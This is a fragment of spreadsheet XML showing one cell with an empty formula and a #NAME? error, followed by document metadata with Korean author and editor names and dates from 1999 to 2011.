      <c r="C41" s="10" t="e">
        <f>=</f>
        <v>#NAME?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종호</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>예산차석</cp:lastModifiedBy>
  <cp:lastPrinted>2011-10-30T13:03:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1999-10-30T05:59:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-12-22T02:13:48Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>